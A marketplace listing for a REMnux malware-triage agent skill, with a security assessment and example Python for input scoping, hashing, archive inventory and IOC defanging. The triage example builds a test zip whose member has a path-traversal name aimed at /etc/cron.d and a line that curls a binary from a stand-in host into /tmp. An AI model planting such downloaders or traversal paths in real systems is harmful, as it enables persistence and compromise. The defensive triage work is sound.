Malware Analyst

by nirhalfon · GitHub · v1.0.0 · MIT-0
cross-platform · Security: Clean ✓
172 downloads · 0 stars · 0 active installs · 1 version
Install in OpenClaw: /install remnux-malware-triage
Description
perform concise malware triage, focused IOC extraction, infrastructure hunting, and markdown report writing on remnux when the user supplies a suspicious fil...
Usage Guidance
This skill appears to be what it claims: a REMnux-focused triage helper that reads user-supplied samples and writes a concise markdown report. Before installing or invoking it, verify:
  1. You will run it in a REMnux environment (or equivalent) that provides the analysis tools it expects.
  2. You are comfortable letting the agent access only the specific files/attachments you supply (don't give it unrelated sensitive paths).
  3. The report output path (/home/remnux/files/output) is acceptable and writable.
  4. You explicitly approve any dynamic execution or external submissions; the skill says it will not perform those without your consent.
If you need stricter guarantees, ask the skill owner for an explicit list of required binaries and permission boundaries.
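The four checks above can be enforced mechanically before the agent is handed any file. The script below is an added example, not code from the remnux-malware-triage skill: the tool list, the allowed input root and the consent phrase are assumptions (the skill declares no required binaries), and the symlink-resolving containment check is what stops a link inside the sample directory from pointing the agent at an unrelated sensitive path.

```python
"""Pre-flight gate for a file-triage skill (added example, not the skill's code).
Assumptions: ASSUMED_TOOLS, the allowed input root and CONSENT_PHRASE are this
example's choices; the skill itself publishes no required-binary list."""
import os
import shutil
from pathlib import Path

# Assumed tool set: the skill does not declare one, so match it to what the skill actually calls.
ASSUMED_TOOLS = ("sha256sum", "file", "strings")
CONSENT_PHRASE = "yes, run it"  # assumed: only an explicit phrase unlocks dynamic analysis


def missing_tools(tools=ASSUMED_TOOLS) -> list:
    """Names from `tools` that are not on PATH."""
    return [t for t in tools if shutil.which(t) is None]


def output_dir_writable(path) -> bool:
    """True only for an existing directory in which we can create files."""
    p = Path(path)
    return p.is_dir() and os.access(p, os.W_OK | os.X_OK)


def scope_inputs(paths, allowed_root) -> tuple:
    """Resolve symlinks first, then keep only regular files under allowed_root.

    Resolving before the containment test is the point: a symlink placed inside
    the root that targets /etc/shadow (or a credentials file) is rejected here.
    Returns (accepted, rejected) as the caller's original path strings."""
    root = Path(allowed_root).resolve()
    accepted, rejected = [], []
    for raw in paths:
        real = Path(raw).resolve()
        inside = root in real.parents
        (accepted if inside and real.is_file() else rejected).append(str(raw))
    return accepted, rejected


def preflight(inputs, allowed_root, out_dir, dynamic_requested=False, consent="",
              tools=ASSUMED_TOOLS) -> dict:
    """Aggregate the checks into a go/no-go decision with human-readable reasons."""
    reasons = []
    missing = missing_tools(tools)
    if missing:
        reasons.append(f"missing tools: {', '.join(missing)}")
    if not output_dir_writable(out_dir):
        reasons.append(f"output dir not writable: {out_dir}")
    accepted, rejected = scope_inputs(inputs, allowed_root)
    if rejected:
        reasons.append(f"inputs outside {allowed_root}: {', '.join(rejected)}")
    if not accepted:
        reasons.append("no usable input files")
    # Dynamic execution is opt-in: a bare True is not consent, only the literal phrase is.
    dynamic_ok = dynamic_requested and consent.strip().lower() == CONSENT_PHRASE
    if dynamic_requested and not dynamic_ok:
        reasons.append("dynamic analysis requested without explicit consent")
    return {"ok": not reasons, "inputs": accepted, "dynamic_allowed": dynamic_ok, "reasons": reasons}


if __name__ == "__main__":
    import json
    import sys
    # /home/remnux/files as the allowed root is an assumption; the output path is the skill's own.
    print(json.dumps(preflight(sys.argv[1:], "/home/remnux/files", "/home/remnux/files/output"), indent=2))
```

Run it with the sample paths you intend to hand the agent; anything rejected never reaches the skill, and a dynamic run is only reported as allowed when the consent phrase was typed, not when a flag happened to be true.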
Capability Analysis
Type: OpenClaw Skill
Name: remnux-malware-triage
Version: 1.0.0
The remnux-malware-triage skill bundle is a legitimate toolset designed for structured malware analysis and triage on a REMnux environment. The instructions in SKILL.md and references/triage-playbook.md emphasize safety, such as defanging network indicators, treating sample content as hostile, and requiring explicit user consent before performing dynamic analysis. The workflow is well-defined, focusing on local file analysis and reporting to a specific output directory (/home/remnux/files/output) without any indicators of malicious intent or data exfiltration.
Capability Assessment
Purpose & Capability
Name/description promise (REMnux triage, IOC extraction, concise reports) matches the SKILL.md and reference documents. The skill does not request unrelated credentials, system paths, or exotic installs — it expects a REMnux analysis environment and stays focused on triage tasks.
Instruction Scope
SKILL.md instructs the agent to read user-supplied files/attachments, compute hashes, inventory archives, and write a markdown report. This is appropriate for triage, but it assumes the platform will provide access to attachments and that writing to /home/remnux/files/output is allowed. The skill explicitly forbids dynamic execution or external submission unless the user requests it, which limits scope creep.
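The first-pass static workflow described in the Capability Analysis and in this section (hash the sample, inventory an archive without extracting it, pull out and defang network indicators, keep observed indicators apart from inferred ones, write a markdown report) looks like the following. This is an added illustration, not the skill's own code: the IOC regexes, the member size cap, the observed/inferred convention and the constructed sample zip are this example's assumptions.

```python
"""First-pass static triage (added example, not the remnux-malware-triage skill's code).
Assumptions: the regexes, MAX_MEMBER_BYTES, the observed/inferred convention and the
constructed sample are this example's own."""
import hashlib
import io
import re
import zipfile
from pathlib import Path, PurePosixPath
from urllib.parse import urlsplit

MAX_MEMBER_BYTES = 10 * 1024 * 1024  # assumed cap: never inflate an unbounded member
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[^\s\"'<>)]*)?")
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def hashes(data: bytes) -> dict:
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256")}


def defang(ioc: str) -> str:
    """Make a network indicator non-clickable: http -> hxxp, every '.' -> '[.]'."""
    return re.sub(r"^http", "hxxp", ioc, flags=re.IGNORECASE).replace(".", "[.]")


def inventory_archive(data: bytes) -> list:
    """List zip members without extracting; flag names that would escape the output dir."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    members = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            p = PurePosixPath(info.filename.replace("\\", "/"))
            members.append({"name": info.filename, "size": info.file_size,
                            "unsafe_path": p.is_absolute() or ".." in p.parts})
    return members


def _blobs(data: bytes):
    """Container bytes first, then each zip member read in memory under a hard cap."""
    yield data
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.file_size <= MAX_MEMBER_BYTES:  # header is hostile too, so read is capped
                    with zf.open(info) as fh:
                        yield fh.read(MAX_MEMBER_BYTES)


def extract_iocs(data: bytes) -> tuple:
    """Observed = literally present in the bytes; inferred = derived, e.g. an observed URL's host."""
    observed, inferred, seen = [], [], set()

    def add(bucket, kind, value, derived_from=None):
        if (kind, value) not in seen:
            seen.add((kind, value))
            bucket.append({"type": kind, "value": value, "from": derived_from})

    for blob in _blobs(data):
        for m in URL_RE.finditer(blob):
            url = m.group().decode("ascii", "replace")
            add(observed, "url", url)
            host = urlsplit(url).hostname or ""
            if host and not IPV4_RE.fullmatch(host.encode()):
                add(inferred, "domain", host, url)
        for m in IPV4_RE.finditer(blob):
            ip = m.group().decode()
            if all(int(o) <= 255 for o in ip.split(".")):  # drop 300.1.2.3-style noise
                add(observed, "ipv4", ip)
    return observed, inferred


def write_report(sample_name: str, data: bytes, out_dir) -> Path:
    """Write <sha256>.md into out_dir with every network indicator defanged; return its path."""
    h, members = hashes(data), inventory_archive(data)
    observed, inferred = extract_iocs(data)
    lines = [f"# Triage: {sample_name}", "", "## Hashes"] + [f"- {k}: {v}" for k, v in h.items()]
    if members:
        lines += ["", "## Archive inventory (listed, not extracted)"]
        lines += [f"- {m['name']} ({m['size']} bytes)" + (" UNSAFE PATH" if m["unsafe_path"] else "")
                  for m in members]
    lines += ["", "## Observed IOCs (defanged)"]
    lines += [f"- {i['type']}: {defang(i['value'])}" for i in observed] or ["- none"]
    lines += ["", "## Inferred IOCs (unconfirmed, defanged)"]
    lines += [f"- {i['type']}: {defang(i['value'])} (from {defang(i['from'])})" for i in inferred] or ["- none"]
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    report = out_dir / f"{h['sha256']}.md"
    report.write_text("\n".join(lines) + "\n", encoding="utf-8")
    return report


def build_sample() -> bytes:
    """Constructed sample: a zip whose member has a traversal name and a C2-looking URL."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("../../etc/cron.d/updater", "curl http://example.com:8080/u.bin -o /tmp/x; 198.51.100.7\n")
        zf.writestr("readme.txt", "nothing to see\n")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    out = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("/home/remnux/files/output")  # skill's path
    print(write_report("sample.zip", build_sample(), out))
```

The report is named by SHA-256, so re-running on the same bytes overwrites rather than duplicates. Member contents are read in memory under a fixed cap and never written to disk, which is what keeps this step static; the traversal-style member name is reported, not honoured. Because the zip is deflated, the URL only turns up from the member scan, and its host is filed under inferred rather than observed.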
Install Mechanism
No install specification or external downloads — instruction-only skill. This minimizes installation risk; it relies on the host REMnux toolchain but does not attempt to fetch or execute third-party code.
Credentials
The skill requests no environment variables or credentials, which is proportionate. One caveat: it implicitly expects REMnux tooling to be present (e.g., hashing, static-analysis tools) but does not declare required binaries; users should ensure the execution environment actually provides those tools.
Persistence & Privilege
The skill's always flag is set to false and it does not request persistent system-wide privileges. It does write reports to a fixed path (/home/remnux/files/output), which is reasonable for its purpose but should be confirmed by the user.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install remnux-malware-triage
  3. After installation, invoke the skill by name or use /remnux-malware-triage
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
remnux-malware-triage 1.0.0 – Initial release
  - Provides triage-first malware analysis on REMnux, focused on identifying primary payloads, extracting IOCs, and tracing infrastructure.
  - Supports intake from file paths, hashes, or chat attachments and emphasizes correct artifact scoping.
  - Follows a first-pass static analysis approach, escalating only if deeper investigation is justified or requested.
  - Separates observed vs inferred indicators and clearly distinguishes unconfirmed IOCs.
  - Outputs concise chat summaries and structured markdown reports to a dedicated output directory.
Metadata
Slug remnux-malware-triage
Version 1.0.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is Malware Analyst?

perform concise malware triage, focused IOC extraction, infrastructure hunting, and markdown report writing on remnux when the user supplies a suspicious fil... It is an AI Agent Skill for Claude Code / OpenClaw, with 172 downloads so far.

How do I install Malware Analyst?

Run "/install remnux-malware-triage" in the OpenClaw or Claude Code chat to install it in one step. The install itself needs no extra setup, but the skill expects a REMnux (or equivalent) analysis environment with the usual triage tools present when it runs.

Is Malware Analyst free?

Yes, Malware Analyst is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Malware Analyst support?

Malware Analyst is cross-platform and runs anywhere OpenClaw / Claude Code is available; its analysis steps, however, expect a REMnux (or equivalent) environment that provides the tools it relies on.

Who created Malware Analyst?

It is built and maintained by nirhalfon (@nirhalfon); the current version is v1.0.0.
